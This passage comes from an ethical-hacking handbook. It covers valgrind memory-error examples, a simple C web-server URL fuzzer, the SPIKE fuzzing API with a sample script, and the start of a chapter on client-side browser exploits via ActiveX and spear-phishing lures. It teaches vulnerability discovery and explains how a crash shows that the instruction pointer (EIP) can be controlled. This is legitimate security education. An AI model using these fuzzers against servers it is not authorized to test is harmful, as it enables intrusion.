accesses performed by the program being interpreted. Basic valgrind analysis is performed
from the command line by invoking the valgrind wrapper and naming the
binary that it should execute. To use valgrind with the following example:
/*
* valgrind_1.c - uninitialized memory access
*/
int main() {
int p, t;
if (p == 5) { /*Error occurs here*/
t = p + 1;
}
return 0;
}
you simply compile the code and then invoke valgrind as follows:
# gcc –o valgrind_1 valgrind_1.c
# valgrind ./valgrind_1
valgrind runs the program and displays memory use information as shown here:
==16541== Memcheck, a.k.a. Valgrind, a memory error detector for x86-linux.
==16541== Copyright (C) 2002-2003, and GNU GPL'd, by Julian Seward.
==16541== Using valgrind-2.0.0, a program supervision framework for x86-linux.
==16541== Copyright (C) 2000-2003, and GNU GPL'd, by Julian Seward.
==16541== Estimated CPU clock rate is 3079 MHz
==16541== For more details, rerun with: -v
==16541==
==16541== Conditional jump or move depends on uninitialised value(s)
==16541== at 0x8048328: main (in valgrind_1)
==16541== by 0xB3ABBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16541== by 0x8048284: (within valgrind_1)
==16541==
==16541== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
==16541== malloc/free: in use at exit: 0 bytes in 0 blocks.
==16541== malloc/free: 0 allocs, 0 frees, 0 bytes allocated.
==16541== For a detailed leak analysis, rerun with: --leak-check=yes
==16541== For counts of detected errors, rerun with: -v
In the example output, the number 16541 in the left margin is the process ID (pid) of
the valgrind process. The first line of output explains that valgrind is making use of its
memcheck tool to perform its most complete analysis of memory use. Following the
copyright notice, you see the single error message that valgrind reports for the example
program. In this case, the variable p is being read before it has been initialized. Because
valgrind operates on compiled programs, it reports virtual memory addresses in its
error messages rather than referencing original source code line numbers. The ERROR
SUMMARY at the bottom is self-explanatory.
A second simple example demonstrates valgrind’s heap-checking capabilities. The
source code for this example is as follows:
/*
* valgrind_2.c - access outside of allocated memory
*/
#include
int main() {
int *p, a;
p = malloc(10 * sizeof(int));
p[10] = 1; /* invalid write error */
a = p[10]; /* invalid read error */
free(p);
return 0;
}
This time valgrind reports errors for an invalid write and read outside of allocated
memory space. Additionally, summary statistics report on the number of bytes of memory
dynamically allocated and released during program execution. This feature makes it
very easy to recognize memory leaks within programs.
==16571== Invalid write of size 4
==16571== at 0x80483A2: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571== Address 0x52A304C is 0 bytes after a block of size 40 alloc'd
==16571== at 0x90068E: malloc (vg_replace_malloc.c:153)
==16571== by 0x8048395: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571==
==16571== Invalid read of size 4
==16571== at 0x80483AE: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571== Address 0x52A304C is 0 bytes after a block of size 40 alloc'd
==16571== at 0x90068E: malloc (vg_replace_malloc.c:153)
==16571== by 0x8048395: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571==
Gray Hat Hacking: The Ethical Hacker’s Handbook
346
==16571== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
==16571== malloc/free: in use at exit: 0 bytes in 0 blocks.
==16571== malloc/free: 1 allocs, 1 frees, 40 bytes allocated.
==16571== For a detailed leak analysis, rerun with: --leak-check=yes
==16571== For counts of detected errors, rerun with: -v
The type of errors reported in this case might easily be caused by off-by-one errors or a
heap-based buffer overflow condition.
The last valgrind example demonstrates reporting of both a memory leak and a double
free problem. The example code is as follows:
/*
* valgrind_3.c – memory leak/double free
*/
#include
int main() {
int *p;
p = (int*)malloc(10 * sizeof(int));
p = (int*)malloc(40 * sizeof(int)); //first block has now leaked
free(p);
free(p); //double free error
return 0;
}
NOTE A double free condition occurs when the free function is called a
second time for a pointer that has already been freed. The second call to
free corrupts heap management information that can result in an exploitable
condition.
The results for this last example follow. In this case, valgrind was invoked with the
detailed leak checking turned on:
# valgrind --leak-check=yes ./valgrind_3
This time an error is generated by the double free, and the leak summary reports that the
program failed to release 40 bytes of memory that it had previously allocated:
==16584== Invalid free() / delete / delete[]
==16584== at 0xD1693D: free (vg_replace_malloc.c:231)
==16584== by 0x80483C7: main (in valgrind_3)
==16584== by 0x126BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16584== by 0x80482EC: (within valgrind_3)
==16584== Address 0x47BC07C is 0 bytes inside a block of size 160 free'd
==16584== at 0xD1693D: free (vg_replace_malloc.c:231)
==16584== by 0x80483B9: main (in valgrind_3)
==16584== by 0x126BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16584== by 0x80482EC: (within valgrind_3)
==16584==
==16584== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
==16584== malloc/free: in use at exit: 40 bytes in 1 blocks.
==16584== malloc/free: 2 allocs, 2 frees, 200 bytes allocated.
==16584== For counts of detected errors, rerun with: -v
==16584== searching for pointers to 1 not-freed blocks.
==16584== checked 4664864 bytes.
Chapter 14: Advanced Reverse Engineering
347
PART IV
Gray Hat Hacking: The Ethical Hacker’s Handbook
348
==16584==
==16584== 40 bytes in 1 blocks are definitely lost in loss record 1 of 1
==16584== at 0xD1668E: malloc (vg_replace_malloc.c:153)
==16584== by 0x8048395: main (in valgrind_3)
==16584== by 0x126BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16584== by 0x80482EC: (within valgrind_3)
==16584==
==16584== LEAK SUMMARY:
==16584== definitely lost: 40 bytes in 1 blocks.
==16584== possibly lost: 0 bytes in 0 blocks.
==16584== still reachable: 0 bytes in 0 blocks.
==16584== suppressed: 0 bytes in 0 blocks.
==16584== Reachable blocks (those to which a pointer was found) are not shown.
==16584== To see them, rerun with: --show-reachable=yes
While the preceding examples are trivial, they do demonstrate the value of valgrind
as a testing tool. Should you choose to fuzz a program, valgrind can be a critical piece of
instrumentation that can help to quickly isolate memory problems, in particular, heapbased
buffer overflows, which manifest themselves as invalid reads and writes in
valgrind.
References
Process Stalker http://pedram.redhive.com/code/process_stalker/
GDE Community Edition www.oreas.com
OllyDbg www.ollydbg.de/
WinDbg www.microsoft.com/whdc/devtools/debugging
Valgrind http://valgrind.kde.org/
Fuzzing
Black box testing works because you can apply some external stimulus to a program and
observe how the program reacts to that stimulus. Monitoring tools give you the capability
to observe the program’s reactions. All that is left is to provide interesting inputs to
the program being tested. As mentioned previously, fuzzing tools are designed for
exactly this purpose, the rapid generation of input cases designed to induce errors in a
program. Because the number of inputs that can be supplied to a program is infinite, the
last thing you want to do is attempt to generate all of your input test cases by hand. It is
entirely possible to build an automated fuzzer to step through every possible input
sequence in a brute-force manner and attempt to generate errors with each new input
value. Unfortunately, most of those input cases would be utterly useless and the amount
of time required to stumble across some useful ones would be prohibitive. The real challenge
of fuzzer development is building them in such a way that they generate interesting
input in an intelligent, efficient manner. An additional problem is that it is very
difficult to develop a generic fuzzer. To reach the many possible code paths for a given
program, a fuzzer usually needs to be somewhat “protocol aware.” For example, a fuzzer
built with the goal of overflowing query parameters in an HTTP request is unlikely to
contain sufficient protocol knowledge to also fuzz fields in an SSH key exchange.
Chapter 14: Advanced Reverse Engineering
349
PART IV
Also, the differences between ASCII and non-ASCII protocols make it more than a trivial
task to port a fuzzer from one application domain to another.
NOTE The Hypertext Transfer Protocol (HTTP) is an ASCII-based protocol
described in RFC 2616. SSH is a binary protocol described in various Internet-
Drafts. RFCs and Internet-Drafts are available online at www.ietf.org.
Instrumented Fuzzing Tools and Techniques
Fuzzing should generally be performed with some form of instrumentation in place.
The goal of fuzzing is to induce an observable error condition in a program. Tools such
as memory monitors and debuggers are ideally suited for use with fuzzers. For example,
valgrind will report when a fuzzer has caused a program executing under valgrind control
to overflow a heap-allocated buffer. Debuggers will usually catch the fault induced
when an invalid memory reference is made as a result of fuzzer provided input. Following
the observation of an error, the difficult job of determining whether the error is
exploitable really begins. Exploitability determination will be discussed in the next
chapter.
A variety of fuzzing tools exist in both the open source and the commercial world.
These tools range from stand-alone fuzzers to fuzzer development environments. In this
chapter, we will discuss the basic approach to fuzzing, as well as introduce a fuzzer
development framework. Chapters 15 and 17 will cover several more recent fuzzing
tools including fuzzers tailored to specific application domains.
A Simple URL Fuzzer
As an introduction to fuzzers, we will look at a simple program for fuzzing web servers.
Our only goal is to grow a long URL and see what effect it has on a target web server. The
following program is not at all sophisticated, but it demonstrates several elements common
to most fuzzers and will assist in understanding more advanced examples:
1: /*
2: * simple_http_fuzzer.c
3: */
4: #include
5: #include
6: #include
7: #include
8: //maximum length to grow our url
9: #define MAX_NAME_LEN 2048
10: //max strlen of a valid IP address + null
11: #define MAX_IP_LEN 16
12: //static HTTP protocol content into which we insert fuzz string
13: char request[] = "GET %*s.html HTTP/1.1\r\nHost: %s\r\n\r\n";
Gray Hat Hacking: The Ethical Hacker’s Handbook
350
14: int main(int argc, char **argv) {
15: //buffer to build our long request
16: char buf[MAX_NAME_LEN + sizeof(request) + MAX_IP_LEN];
17: //server address structure
18: struct sockaddr_in server;
19: int sock, len, req_len;
20: if (argc != 2) { //require IP address on the command line
21: fprintf(stderr, "Missing server IP address\n");
22: exit(1);
23: }
24: memset(&server, 0, sizeof(server)); //clear the address info
25: server.sin_family = AF_INET; //building an IPV4 address
26: server.sin_port = htons(80); //connecting to port 80
27: //convert the dotted IP in argv[1] into network representation
28: if (inet_pton(AF_INET, argv[1], &server.sin_addr) <= 0) {
29: fprintf(stderr, "Invalid server IP address: %s\n", argv[1]);
30: exit(1);
31: }
32: //This is the basic fuzzing loop. We loop, growing the url by
33: //4 characters per pass until an error occurs or we reach MAX_NAME_LEN
34: for (len = 4; len < MAX_NAME_LEN; len += 4) {
35: //first we need to connect to the server, create a socket...
36: sock = socket(AF_INET, SOCK_STREAM, 0);
37: if (sock == -1) {
38: fprintf(stderr, "Could not create socket, quitting\n");
39: exit(1);
40: }
41: //and connect to port 80 on the web server
42: if (connect(sock, (struct sockaddr*)&server, sizeof(server))) {
43: fprintf(stderr, "Failed connect to %s, quitting\n", argv[1]);
44: close(sock);
45: exit(1); //terminate if we can't connect
46: }
47: //build the request string. Request really only reserves space for
48: //the name field that we are fuzzing (using the * format specifier)
49: req_len = snprintf(buf, sizeof(buf), request, len, "A", argv[1]);
50: //this actually copies the growing number of A's into the request
51: memset(buf + 4, 'A', len);
52: //now send the request to the server
53: send(sock, buf, req_len, 0);
54: //try to read the server response, for simplicity’s sake let’s assume
55: //that the remote side choked if no bytes are read or a recv error
56: //occurs
57: if (read(sock, buf, sizeof(buf), 0) <= 0) {
58: fprintf(stderr, "Bad recv at len = %d\n", len);
59: close(sock);
60: break; //a recv error occurred, report it and stop looping
61: }
62: close(sock);
63: }
64: return 0;
65: }
The essential elements of this program are its knowledge, albeit limited, of the HTTP
protocol contained entirely in line 13, and the loop in lines 34–63 that sends a new
request to the server being fuzzed after generating a new larger filename for each pass
through the loop. The only portion of the request that changes between connections is
the filename field (%*s) that gets larger and larger as the variable len increases. The
asterisk in the format specifier instructs the snprintf() function to set the length according
to the value specified by the next variable in the parameter list, in this case len. The
remainder of the request is simply static content required to satisfy parsing expectations
on the server side. As len grows with each pass through the loop, the length of the filename
passed in the requests grows as well. Assume for example purposes that the web
server we are fuzzing, bad_httpd, blindly copies the filename portion of a URL into a
256-byte, stack-allocated buffer. You might see output such as the following when running
this simple fuzzer:
# ./simple_http_fuzzer 127.0.0.1
# Bad recv at len = 276
From this output you might conclude that the server is crashing when you grow your
filename to 276 characters. With appropriate debugger output available, you might also
find out that your input overwrites a saved return address and that you have the potential
for remote code execution. For the previous test run, a core dump from the vulnerable
web server shows the following:
# gdb bad_httpd core.16704
Core was generated by './bad_httpd'.
Program terminated with signal 11, Segmentation fault.
#0 0x006c6d74 in ?? ()
This tells you that the web server terminated because of a memory access violation and
that execution halted at location 0x006c6d74, which is not a typical program address. In
fact, with a little imagination, you realize that it is not an address at all, but the string
“tml”. It appears that the last 4 bytes of the filename buffer have been loaded into eip,
causing a segfault. Since you can control the content of the URL, you can likely control
the content of eip as well, and you have found an exploitable problem.
Note that this fuzzer does exactly one thing: it submits a single long filename to aweb
server. A more interesting fuzzer might throw additional types of input at the target web
server, such as directory traversal strings. Any thoughts of building a more sophisticated
fuzzer from this example must take into account a variety of factors, such as:
• What additional static content is required to make new requests appear to be
valid? What if you wanted to fuzz particular HTTP request header fields, for
example?
• Additional checks imposed on the recv operation to allow graceful failure of
recv operations that time out. Possibilities include setting an alarm or using the
select function to monitor the status of the socket.
• Accommodating more than one fuzz string.
Chapter 14: Advanced Reverse Engineering
351
PART IV
As an example, consider the following URL:
http://gimme.money.com/cgi-bin/login?user=smith&password=smithpass
What portions of this request might you fuzz? It is important to identify those portions
of a request that are static and those parts that are dynamic. In this case, the supplied
request parameter values smith and smithpass are logical targets for fuzzing, but
they should be fuzzed independently from each other, which requires either two separate
fuzzers (one to fuzz the user parameter and one to fuzz the password parameter), or
a single fuzzer capable of fuzzing both parameters at the same time. A multivariable
fuzzer requires nested iteration over all desired values of each variable being fuzzed, and
is therefore somewhat more complex to build than the simple single variable fuzzer in
the example.
Fuzzing Unknown Protocols
Building fuzzers for open protocols is often a matter of sitting down with an RFC and
determining static protocol content that you can hard-code and dynamic protocol content
that you may want to fuzz. Static protocol content often includes protocol-defined
keywords and tag values, while dynamic protocol content generally consists of user-supplied
values. How do you deal with situations in which an application is using a proprietary
protocol whose specifications you don’t have access to? In this case, you must
reverse-engineer the protocol to some degree if you hope to develop a useful fuzzer. The
goals of the reverse-engineering effort should be similar to your goals in reading an RFC:
identifying static versus dynamic protocol fields. Without resorting to reverse-engineering
a program binary, one of the few ways you can hope to learn about an unknown protocol
is by observing communications to and from the program. Network sniffing tools
might be very helpful in this regard. The WireShark network monitoring tool, for example,
can capture all traffic to and from an application and display it in such a way as to
isolate the application layer data that you want to focus on. Initial development of a
fuzzer for a new protocol might simply build a fuzzer that can mimic a valid transaction
that you have observed. As protocol discovery progresses, the fuzzer is modified to preserve
known static fields while attempting to mangle known dynamic fields. The most
difficult challenges are faced when a protocol contains dependencies among fields. In
such cases, changing only one field is likely to result in an invalid message being sent
from the fuzzer to the server. A common example of such dependencies is embedded
length fields as seen in this simple HTTP POST request:
POST /cgi-bin/login.pl HTTP/1.1
Host: gimme.money.com
Connection: close
User-Agent: Mozilla/6.0
Content-Length: 29
Content-Type: application/x-www-form-encoded
user=smith&password=smithpass
Gray Hat Hacking: The Ethical Hacker’s Handbook
352
In this case, if you want to fuzz the user field, then each time you change the length of
the user value, you must be sure to update the length value associated with the Content-
Length header. This somewhat complicates fuzzer development, but it must be properly
handled so that your messages are not rejected outright by the server simply for violating
the expected protocol.
SPIKE
SPIKE is a fuzzer creation toolkit/API developed by Dave Aitel of Immunity, Inc. SPIKE
provides a library of C functions for use by fuzzer developers. Only Dave would call SPIKE
pretty, but it was one of the early efforts to simplify fuzzer development by providing
buffer construction primitives useful in many fuzzing situations. SPIKE is designed to
assist in the creation of network-oriented fuzzers and supports sending data via TCP or
UDP. Additionally, SPIKE provides several example fuzzers for protocols ranging from
HTTP to Microsoft Remote Procedure Call (MSRPC). SPIKE libraries can be used to form
the foundation of custom fuzzers, or SPIKE’s scripting capabilities can be used to rapidly
develop fuzzers without requiring detailed knowledge of C programming.
The SPIKE API centers on the notion of a “spike” data structure. Various API calls are
used to push data into a spike and ultimately send the spike to the application being
fuzzed. Spikes can contain static data, dynamic fuzzing variables, dynamic length values,
and grouping structures called blocks. A SPIKE “block” is used to mark the beginning
and end of data whose length should be computed. Blocks and their associated length
fields are created with name tags. Prior to sending a spike, the SPIKE API handles all of
the details of computing block lengths and updating the corresponding length field for
each defined block. SPIKE cleanly handles nested blocks.
We will review some of the SPIKE API calls here. The API is not covered in sufficient
detail to allow creation of stand-alone fuzzers, but the functions described can easily be
used to build a SPIKE script. Most of the available functions are declared (though not
necessarily described) in the file spike.h. Execution of a SPIKE script will be described
later in the chapter.
Spike Creation Primitives
When developing a stand-alone fuzzer, you will need to create a spike data structure into
which you will add content. All of the SPIKE content manipulation functions act on the
“current” spike data structure as specified by the set_spike() function. When creating
SPIKE scripts, these functions are not required, as they are automatically invoked by the
script execution engine.
• struct spike *new_spike() Allocate a new spike data structure.
• int spike_free(struct spike *old_spike) Release the indicated
spike.
• int set_spike(struct spike *newspike) Make newspike the current
spike. All future calls to data manipulation functions will apply to this spike.
Chapter 14: Advanced Reverse Engineering
353
PART IV
Gray Hat Hacking: The Ethical Hacker’s Handbook
354
SPIKE Static Content Primitives
None of these functions requires a spike as a parameter; they all operate on the current
spike as set with set_spike.
• s_string(char *instring) Insert a static string into a spike.
• s_binary(char *instring) Parse the provided string as hexadecimal
digits and add the corresponding bytes into the spike.
• s_bigword(unsigned int aword) Insert a big-endian word into the
spike. Inserts 4 bytes of binary data into the spike.
• s_xdr_string(unsigned char *astring) Insert the 4-byte length of
astring followed by the characters of astring into the spike. This function
generates the XDR representation of astring.
NOTE XDR is the External Data Representation standard, which describes
a standard way in which to encode various types of data such as integers,
floating-point numbers, and strings.
• s_binary_repeat(char *instring, int n) Add n sequential instances
of the binary data represented by the string instring into the spike.
• s_string_repeat(char *instring, int n) Add n sequential instances
of the string instring into the spike.
• s_intelword(unsigned int aword) Add 4 bytes of little-endian binary
data into the spike.
• s_intelhalfword(unsigned short ashort) Add 2 bytes of littleendian
binary data into the spike.
SPIKE Block Handling Primitives
The following functions are used to define blocks and insert placeholders for block
length values. Length values are filled in prior to sending the spike, once all fuzzing variables
have been set.
• int_block_start(char *blockname) Start a named block. No new
content is added to the spike. All content added subsequently up to the
matching block_end call is considered part of the named block and contributes
to the block’s length.
• int s_block_end(char *blockname) End the named block. No new
content is added to the spike. This marks the end of the named block for length
computation purposes.
Chapter 14: Advanced Reverse Engineering
355
PART IV
Block lengths may be specified in many different ways depending on the protocol
being used. In HTTP, a block length may be specified as an ASCII string, while binary
protocols may specify block lengths using big- or little-endian integers. SPIKE provides a
number of block length insertion functions covering many different formats.
• int s_binary_block_size_word_bigendian(char
*blockname) Inserts a 4-byte big-endian placeholder to receive the length
of the named block prior to sending the spike.
• int s_binary_block_size_halfword_bigendian(char
*blockname) Inserts a 2-byte big-endian block size placeholder.
• int s_binary_block_size_intel_word(char *blockname) Inserts
a 4-byte little-endian block size placeholder.
• int s_binary_block_size_intel_halfword(char
*blockname) Inserts a 2-byte little-endian block size placeholder.
• int s_binary_block_size_byte(char *blockname) Inserts a 1-byte
block size placeholder.
• int s_blocksize_string(char *blockname, int n) Inserts an n
character block size placeholder. The block length will be formatted as an ASCII
decimal integer.
• int s_blocksize_asciihex(char *blockname) Inserts an 8-character
block size placeholder. The block length will be formatted as an ASCII hex
integer.
SPIKE Fuzzing Variable Declaration
The last function required for developing a SPIKE-based fuzzer provides for declaring
fuzzing variables. A fuzzing variable is a string that SPIKE will manipulate in some way
between successive transmissions of a spike.
• void s_string_variable(unsigned char *variable) Insert an
ASCII string that SPIKE will change each time a new spike is sent.
When a spike contains more than one fuzzing variable, an iteration process is usually
used to modify each variable in succession until every possible combination of the variables
has been generated and sent.
SPIKE Script Parsing
SPIKE offers a limited scripting capability. SPIKE statements can be placed in a text file
and executed from within another SPIKE-based program. All of the work for executing
scripts is accomplished by a single function.
• int s_parse(char *filename) Parse and execute the named file as a
SPIKE script.
A Simple SPIKE Example
Consider the HTTP post request we looked at earlier:
POST /cgi-bin/login.pl HTTP/1.1
Host: gimme.money.com
Connection: close
User-Agent: Mozilla/6.0
Content-Length: 29
Content-Type: application/x-www-form-encoded
user=smith&password=smithpass
The following sequence of SPIKE calls would generate valid HTTP requests while fuzzing
the user and password fields in the request:
s_string("POST /cgi-bin/login.pl HTTP/1.1\r\n");
s_string("Host: gimme.money.com\r\n);
s_string("Connection: close\r\n");
s_string("User-Agent: Mozilla/6.0\r\n");
s_string("Content-Length: ");
s_blocksize_string("post_args", 7);
s_string("\r\nContent-Type: application/x-www-form-encoded\r\n\r\n");
s_block_start("post_args");
s_string("user=");
s_string_variable("smith");
s_string("&password=");
s_string_variable("smithpass");
s_block_end("post_args");
These statements constitute a valid SPIKE script (we refer to this script as demo.spk).
All that is needed now is a way to execute these statements. Fortunately, the SPIKE distribution
comes with a simple program called generic_send_tcp that takes care of the
details of initializing a spike, parsing a script into the spike, and iterating through all
fuzzing variables in the spike. Five arguments are required to run generic_send_tcp: the
host to be fuzzed, the port to be fuzzed, the filename of the spike script, information on
whether any fuzzing variables should be skipped, and whether any states of each fuzzing
variable should be skipped. These last two values allow you to jump into the middle of a
fuzzing session, but for our purposes, set them to zero to indicate that you want all variables
fuzzed and every possible value used for each variable. Thus the following command
line would cause demo.spk to be executed:
# ./generic_send_tcp gimme.money.com 80 demo.spk 0 0
If the web server at gimme.money.com had difficulty parsing the strings thrown at it
in the user and password fields, then you might expect generic_tcp_send to report errors
encountered while reading or writing to the socket connecting to the remote site.
If you’re interested in learning more about writing SPIKE-based fuzzers, you should read
through and understand generic_send_tcp.c. It uses all of the basic SPIKE API calls in order
to provide a nice wrapper around SPIKE scripts. More detailed information on the SPIKE
API itself can only be found by reading through the spike.h and spike.c source files.
Gray Hat Hacking: The Ethical Hacker’s Handbook
356
Chapter 14: Advanced Reverse Engineering
357
PART IV SPIKE Proxy
SPIKE Proxy is another fuzzing tool, developed by Dave Aitel, that performs fuzzing of
web-based applications. The tool sets itself up as a proxy between you and the website or
application you want to fuzz. By configuring a web browser to proxy through SPIKE
Proxy, you interact with SPIKE Proxy to help it learn some basic information about the
site being fuzzed. SPIKE Proxy takes care of all the fuzzing and is capable of performing
attacks such as SQL injection and cross-site scripting. SPIKE Proxy is written in Python
and can be tailored to suit your needs.
Sharefuzz
Also authored by Dave Aitel, Sharefuzz is a fuzzing library designed to fuzz set user ID
(SUID) root binaries.
NOTE A SUID binary is a program that has been granted permission to run
as a user other than the user that invokes the program. The classic example is
the passwd program, which must run as root in order to modify the system
password database.
Vulnerable SUID root binaries can provide an easy means for local privilege escalation
attacks. Sharefuzz operates by taking advantage of the LD_PRELOAD mechanism
on Unix systems. By inserting itself as a replacement for the getenv library function,
Sharefuzz intercepts all environment variable requests and returns a long string rather
than the actual environment variable value. Figure 14-4 shows a standard call to the
getenv library function, while Figure 14-5 shows the results of a call to getenv once the
program has been loaded with Sharefuzz in place. The goal is to locate binaries that fail
to properly handle unexpected environment string values.
Figure 14-4
Normal call to
getenv using libc
Figure 14-5
Fuzzed call to
getenv with
Sharefuzz in place
Reference
SPIKE, SPIKE Proxy, Sharefuzz www.immunitysec.com/resources-freesoftware.shtml
Gray Hat Hacking: The Ethical Hacker’s Handbook
358
CHAPTER15 Client-Side Browser
Exploits
In this chapter, you will learn about client-side vulnerabilities and several tools for
discovering client-side vulnerabilities. This chapter mostly focuses on vulnerabilities
affecting Internet Explorer on the Microsoft Windows platform, but the concepts can
be extended to other classes of client-side vulnerabilities and other platforms where
client-side applications run.
• Why client-side vulnerabilities are interesting
• Internet Explorer security concepts
• Notable client-side exploits in recent history
• Finding new browser-based vulnerabilities with MangleMe, AxEnum, and AxMan
• Heap spray to exploit
• Protecting yourself from client-side exploits
Why Client-Side Vulnerabilities Are Interesting
Client-side vulnerabilities are vulnerabilities in client software such as web browsers, email
applications, and media players. At first, you might not think that these vulnerabilities
are very interesting. After all, wouldn’t an attacker have to get access to your client
workstation in order to target vulnerabilities in your client software? The firewall should
protect you from those attacks, right? Oh, and your corporation uses a proxy server to
protect against web attacks, so that is double protection! And it’s not like the attack
could take over the system either, right? It’s just a web browser…
This section addresses those misconceptions.
Client-Side Vulnerabilities Bypass Firewall Protections
With more and more computers protected from attack by a host-based or perimeter
firewall, attackers have changed tactics. The fire-and-forget attacks of 2003 are now
blocked by on-by-default firewalls. This change makes client-side vulnerabilities more
interesting to the attacker.
If you recall, firewalls typically block new, inbound connection attempts but allow
users behind the firewall to create outbound connections, which allow both parties of
that established connection to communicate freely in both directions over that channel.
359
Gray Hat Hacking: The Ethical Hacker’s Handbook
360
If an attacker wants to attack your firewall-protected computer, he will normally be
blocked by your firewall. However, if the attacker instead hosts the domain evil.com and
entices you to browse to www.evil.com, he now has a communication channel to interact
with your computer. The universe of attack possibilities is limited for this attacker,
however. He needs to find a vulnerability either in the browser or in a component that
the browser uses to display web content. If the attacker finds such a vulnerability, the
firewall is no longer relevant. Your established connection to www.evil.com allows the
attacker to present an attack over this connection.
Client-Side Applications Are Often Running
with Administrative Privileges
Client-side vulnerabilities exploited for code execution result in attack code executing at
the same privilege level as the client-side application executes normally. Contrast this
with attacks such as Blaster or Slammer, which targeted system services running at a high
privilege level (typically LocalSystem). However, do not be fooled into thinking that
client-side vulnerabilities are less dangerous than system service exploits. Many users log
onto their workstation as a user in the local administrators group. If the users are logged
in as an administrator, their Internet Explorer or Outlook session is also running as an
administrator. Successful client-side exploits targeting that Internet Explorer or Outlook
session also would run with administrative privileges. This gives all the same rights as an
attack against a system level service—administrators can install rootkits and key loggers,
install and start services, access LSA secrets. With these rights, the attack also covers its
tracks in the event log. If victims log on as an administrator, they are vulnerable to
potential “browse-and-you’re-owned” exploits.
NOTE Windows Vista introduced several new features to help client-side
applications not run with full administrative privileges. Internet Explorer
Protected Mode and Vista’s User Access Control are useful defense-in-depth
features to help users run at a lower privilege level. For more detail on how to
run at a lower privilege level on down-level Windows platforms, see the “Run Internet-
Facing Applications with Reduced Privileges” section later in this chapter.
Client-Side Vulnerabilities Can Easily Target Specific
People or Organizations
For attackers earning 20 cents per adware install, it doesn’t matter who is targeted by the
attack—they earn the same 20 cents regardless of the victim. However, some attackers
are interested in targeting specific victims or victims belonging to a specific group, company,
or organization. You don’t hear it in the news much, but corporations and nationstates
are being targeted today by client-side attacks with the intent of industrial espionage
and stealing secrets. This is sometimes referred to as spear phishing.
PART IV
NOTE More information on spear phishing can be found at the following
URLs:
www.microsoft.com/athome/security/email/spear_phishing.mspx
www.pcworld.com/article/id,122497-page,1/article.html
Client-side vulnerabilities are especially effective in spear phishing attacks because an
attacker can easily choose a set of “targets” (people) and deliver a lure to them via e-mail
without knowing anything about their target network configuration. Attackers build
sophisticated, convincing e-mails that appear to be from a trusted associate. Victims click
on a link in the e-mail and end up at evil.com with the attacker serving up malicious web
content from an attack web server to the victim’s workstation. If an attacker has found a
client-side vulnerability in the victim’s browser or a component used by the browser, she
can then run code on any specific person’s computer whose e-mail is known.
Internet Explorer Security Concepts
To understand how these attacks work, it’s important to understand the components
and concepts Internet Explorer uses for a rich and engaging browsing experience. The
two most important ideas to understand are ActiveX controls and Internet Explorer
security zones.
ActiveX Controls
Microsoft added ActiveX support to Internet Explorer to give developers the opportunity
to extend the browsing experience. These “controls” are just small programs written to
be run from within a container, usually Internet Explorer. ActiveX controls can do just
about anything that the user running them can do, including access the registry or modify
the file system. Yikes! Before Internet Explorer will install and run an ActiveX control,
however, it presents a security warning to the user along with a digital signature from the
control’s developer. The user then makes a trust decision based on the developer, the
name of the control, and the digital signature. The danger comes when a control is
marked as safe to be scripted by anyone, is signed by a trustworthy corporation, and has
a security vulnerability. When a bad guy finds this vulnerability, he can host a copy of
the ActiveX control on his evil.com web server, build HTML code to instantiate the
ActiveX control, and then lure an unsuspecting user to browse to the web page and
accept the security dialog box. As an example of how ActiveX controls work, the text
below is HTML that instantiates the Adobe Flash ActiveX control to play a movie.
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/
swflash.cab#version=6,0,40,0">
Chapter 15: Client-Side Browser Exploits
361
You can interpret the preceding blob of HTML by breaking it down into the following
components:
• I want to load an object having the identifier D27CDB6E-AE6D-11cf-96B8-
444553540000. If it’s already installed, information about where it is installed
can be found in the registry under HKCR\CLSID\{D27CDB6E-AE6D-11cf-
96B8-444553540000}.
• If the control is not yet installed, I want to download it from http://
download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab.
• I need version 6.0.40.0 or higher. If my version is less than 6.0.40.0, I want to
download http://download.macromedia.com/pub/shockwave/cabs/flash/
swflash.cab and use that object instead of the object I already have installed.
• This object takes a parameter named movie. The value to pass to this parameter
is “http://www.apple.com/appletv/media/connect.swf”.
There are some very interesting security implications here when you think about an
attacker hosting an object tag and luring an unsophisticated user to the website. Chew
on that for a while and we’ll discuss abusing the design factors of ActiveX controls later
in the chapter.
Internet Explorer Security Zones
One more piece of background knowledge you need to understand client-side browser
exploits is the idea of Internet Explorer security zones. Assigning websites to different
“zones” gives you the flexibility to trust some websites more than others. For example,
you might choose to trust your corporate web server and allow it to run Java applications
while refusing to run Java applications from web servers on the Internet. The four builtin
IE security zones are Restricted Sites, Internet, Intranet, and Trusted Sites from least permissive
to most permissive. You can read about the default security settings for each
zone and how IE decides which zone the URL should be loaded in at http://msdn2
.microsoft.com/en-us/library/ms537183.aspx. There’s also one implicit security zone
called Local Machine zone.
As you might guess, web pages loaded in the most restrictive Restricted Sites zone are
locked down. They are not allowed to load ActiveX controls or even to run JavaScript.
One important use for this zone is viewing the least trusted content of all—e-mail. Outlook
uses the guts of Internet Explorer to view HTML-based e-mail and it loads content
in the Restricted Sites zone, so viewing in the Outlook preview pane is fairly safe. As you
might guess, the trust level increases and security restrictions are relaxed as you progress
along the zone list. Scripting and safe-for-scripting ActiveX controls are allowed in the
Internet zone but IE won’t pass NTLM authentication credentials. Sites loaded in the
Intranet zone are assumed to have some level of trust, and some security restrictions
are relaxed, enabling Intranet line-of-business applications to work. The Local Machine
zone (LMZ) is where things get really interesting to the attacker, though.
Gray Hat Hacking: The Ethical Hacker’s Handbook
362
Before Windows XP Service Pack 2, web pages loaded in the LMZ could run unsigned
